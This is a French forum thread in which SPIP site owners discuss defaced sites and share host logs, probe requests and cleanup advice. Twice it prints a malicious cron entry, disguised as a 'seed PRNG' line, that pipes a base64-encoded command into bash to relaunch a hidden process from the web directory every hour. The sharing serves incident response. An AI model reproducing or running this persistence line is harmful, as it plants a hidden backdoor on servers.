Bonjour, petit message pour information sur un site en php 8 et spip 4.3.2.
Il y a quelques minutes IONOS m’informe d’une intrusion sur un de mes sites.
Défaçage total et remplacement par une pub pour un casino de Macau.
Il ne reste rien des fichiers spip.
je trouve un fichier index.php qui renvoi vers un dossier .kon
J’efface, installe spip_loader.php, SPIP 4.3.2 se réinstalle , ouf la base de données est intacte.
En ce moment je recharge le dossier IMG dont je conserve une copie sur mon ordi et je compléterais avec la sauvegarde IONOS d’hier.
Il restera à reinstaller les plugins.
Encore un trou ?
un fichier zippé du dossier .kon est dispo
À ce jour, pas à notre connaissance. Es-tu certain que ton site a bien été mis à jour rapidement lors de la sortie de SPIP 4.3.2 ? Sans ça, il aurait pu être « piraté » avant, et donc compromis.
oui c’est un des premiers sites que je mets à jour
Est-ce que tu as pu analyser les logs de l’hébergeur ?
J’y vais
Le 8 oct. 2024 à 12:07, Fa_b via Discuter de SPIP noreply@discuter.spip.net a écrit :
Fa_b
Octobre 8Est-ce que tu as pu analyser les logs de l’hébergeur ?
Voir le sujet ou répondre à ce courriel pour répondre.
Pour vous désabonner de ces courriels, cliquez ici.
20.171.206.0 - - [08/Oct/2024:08:54:47 +0200] "GET /spip.php?page=backend&id_auteur=1026 HTTP/1.1" 200 23536 web-saraf.net "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)" "-"
dans le cas present le site visé n’est pas celui qui a été hacké.
Ces requetes (une par seconde) arrivent par vagues de trois à quatre . apres le vidage des fichiers du hacker, ces requetes ont cessé.
Il y a aussi ça :
152.89.255.0 - - [08/Oct/2024:00:51:24 +0200] "GET /spip.php?page=spip_pass HTTP/1.1" 200 7558 aph-france.fr "-" "python-requests/2.32.3" "-"
visant plusieurs des sites du serveur
le reste me semble des requetes classiques internautes ou bots habituels
Je viens ici pour informer la communauté que notre site hébergé chez OVH a aussi été victime de ce piratage (défaçage pour un site commercial, suppression de l’ensemble des dossiers et même dossier .kon à la racine).
Le site a été down une première fois il y a 3 semaine pour une autre faille (pour laquelle nous avons tardé à mettre le correctif). Depuis passage à la dernière version (4.3.2) mais 1 semaine plus tart rebelotte avec cette fois cette nouvelle attaque. Reste à savoir si un fichier était resté dans un dossier depuis l’attaque précédente ou s’il s’agit bien d’une faille.
Si vous voulez plus d’info, indiquez moi les précédures pour récupérer les log ou code que vous souhaitez.
Je remets un 4.3.2 neuf mais sans correctif, je ne sais pas si c’est très opportun…
@Lyam et @WilliamF Vérifiez ou faites vérifier les cron (crontab -e), il peut y avoir une tâche qui réinstalle des trucs.
Vérifiez aussi (ou faites vérifier / vider) /tmp, /var/tmp et /dev/shm
Par expérience, ce sont les points que j’ai eu à vérifier / nettoyer avant de réinstaller un SPIP propre, sur des installations qui n’étaient pas à jour et se retrouvaient pourries à peine réinstallées.
Ensuite la procédure habituelle de nettoyage : backup de ce qui est vital (/IMG en vérifiant bien ce qu’il y a dedans + autres trucs si besoin), suppression complète de tout le contenu du répertoire web, réinstallation.
à la fin des taches cron j’ai trouvé
# DO NOT REMOVE THIS LINE. SEED PRNG. #kcached-sqli-kernel
0 * * * * { echo L2Jpbi9wa2lsbCAtMCAtVTU4NTkxNDYga2NhY2hlZC1zcWxpIDI+L2Rldi9udWxsIHx8IFNIRUxMPS9iaW4vYmFzaCBURVJNPXh0ZXJtLTI1NmNvbG9yIEdTX0FSR1M9Ii1rIC9rdW5kZW4vaG9tZXBhZ2VzLzIzL2Q4Mzg0NDM5MjcvaHRkb2NzLy5jb25maWcvaHRvcC9rY2FjaGVkLXNxbGkuZGF0IC1saXFEIiAvYmluL2Jhc2ggLWMgImV4ZWMgLWEgJ2tjYWNoZWQtc3FsaScgJy9rdW5kZW4vaG9tZXBhZ2VzLzIzL2Q4Mzg0NDM5MjcvaHRkb2NzLy5jb25maWcvaHRvcC9rY2FjaGVkLXNxbGknIiAyPi9kZXYvbnVsbAo=|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng kcached-sqli-kernel
il s’agirait (si j’ai bien compris Found Base64-encoded commands in cron scheduler. What does it do? - Super User) d’un appel à un logiciel de mining
@wilimac tu peux utiliser le bouton de mise en forme « texte préformaté » pour que les lignes de code que tu copies/colles soient bien lisibles.
0 * * * * { echo L2Jpbi9wa2lsbCAtMCAtVTU4NTkxNDYga2NhY2hlZC1zcWxpIDI+L2Rldi9udWxsIHx8IFNIRUxMPS9iaW4vYmFzaCBURVJNPXh0ZXJtLTI1NmNvbG9yIEdTX0FSR1M9Ii1rIC9rdW5kZW4vaG9tZXBhZ2VzLzIzL2Q4Mzg0NDM5MjcvaHRkb2NzLy5jb25maWcvaHRvcC9rY2FjaGVkLXNxbGkuZGF0IC1saXFEIiAvYmluL2Jhc2ggLWMgImV4ZWMgLWEgJ2tjYWNoZWQtc3FsaScgJy9rdW5kZW4vaG9tZXBhZ2VzLzIzL2Q4Mzg0NDM5MjcvaHRkb2NzLy5jb25maWcvaHRvcC9rY2FjaGVkLXNxbGknIiAyPi9kZXYvbnVsbAo=|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng kcached-sqli-kernel